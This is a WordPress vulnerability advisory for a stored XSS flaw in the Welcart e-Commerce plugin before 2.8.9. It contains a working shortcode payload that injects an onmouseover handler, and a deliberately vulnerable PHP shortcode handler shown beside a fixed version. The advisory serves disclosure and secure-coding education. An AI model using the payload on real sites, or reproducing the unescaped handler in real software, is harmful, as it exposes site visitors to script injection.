wpvulndb | Lana Codes | WPVDB-ID: A1C70C80-E952-4CC7-ACA0-C2DDE3FA08A9
History: Dec 23, 2022 - 12:00 a.m.

Welcart e-Commerce < 2.8.9 - Contributor+ Stored XSS via Shortcode

2022-12-23 00:00:00
Lana Codes
wpscan.com
9
welcart e-commerce
stored xss
shortcode
contributor
cross-site scripting

0.001 Low

EPSS

Percentile

23.5%

The plugin does not validate or escape one of its shortcode attributes before outputting it in HTML. Because shortcodes are expanded at render time, the payload survives the post-content filtering that normally strips event handlers from low-privileged users' HTML, so a user with a role as low as Contributor can store a Cross-Site Scripting payload that fires for anyone who views the rendered page.

PoC

1. Add a product item to the plugin, for example with the item name "first". This name is referenced by the shortcode.
2. Insert the exploit shortcode into a post:

   [button_to_cart item='first' value='SUBMIT" onmouseover="alert(1)" style="border:5px solid red;"']

   The double quote in the value attribute closes the rendered HTML attribute, and the injected onmouseover handler executes when the button is hovered.
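The following is an added illustration of the bug class described above, not Welcart's own code: a hypothetical WordPress shortcode handler (demo_button_to_cart, assumed name and markup) that interpolates the user-controlled value attribute straight into an HTML attribute, followed by the hardened form that escapes for the attribute context with esc_attr() and restricts the item name to a safe identifier.

```php
<?php
// Added example, not code from the Welcart plugin. The shortcode name,
// the rendered markup and the attribute defaults are assumptions.

// Vulnerable pattern: $atts['value'] is written into an HTML attribute
// without escaping. Note that KSES filtering of a Contributor's post
// content does not touch the inside of a shortcode, so the payload
// reaches this handler intact and is expanded on every page view.
function demo_button_to_cart_vulnerable( $atts ) {
    $atts = shortcode_atts(
        array( 'item' => '', 'value' => 'Add to cart' ),
        $atts,
        'demo_button_to_cart_vuln'
    );
    return '<input type="submit" name="' . $atts['item'] . '" value="' . $atts['value'] . '">';
}
// With value='SUBMIT" onmouseover="alert(1)" style="border:5px solid red;"'
// the string above becomes
//   <input type="submit" name="first" value="SUBMIT" onmouseover="alert(1)" style="border:5px solid red;">
// i.e. the attacker has closed the value attribute and added an event handler.

// Hardened pattern: sanitize the item identifier and escape every value
// in the attribute context it is used in. esc_attr() turns the closing
// double quote into &quot;, so the browser never leaves the value attribute.
function demo_button_to_cart_fixed( $atts ) {
    $atts = shortcode_atts(
        array( 'item' => '', 'value' => 'Add to cart' ),
        $atts,
        'demo_button_to_cart'
    );
    // sanitize_key() keeps only lowercase alphanumerics, dashes and
    // underscores; adjust the allow-list to whatever the product key format is.
    $item = sanitize_key( $atts['item'] );
    return '<input type="submit" name="' . esc_attr( $item ) . '" value="' . esc_attr( $atts['value'] ) . '">';
}

add_shortcode( 'demo_button_to_cart_vuln', 'demo_button_to_cart_vulnerable' );
add_shortcode( 'demo_button_to_cart', 'demo_button_to_cart_fixed' );
```

When reviewing a plugin for this class of bug, look at every shortcode callback and check that each attribute is passed through the escaping function matching its output context (esc_attr() for attributes, esc_html() for text nodes, esc_url() for href/src) rather than relying on the user's capability level, since shortcode attributes bypass the HTML filtering applied to the post body.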

CPE Name     Operator   Version
usc-e-shop   lt         2.8.9
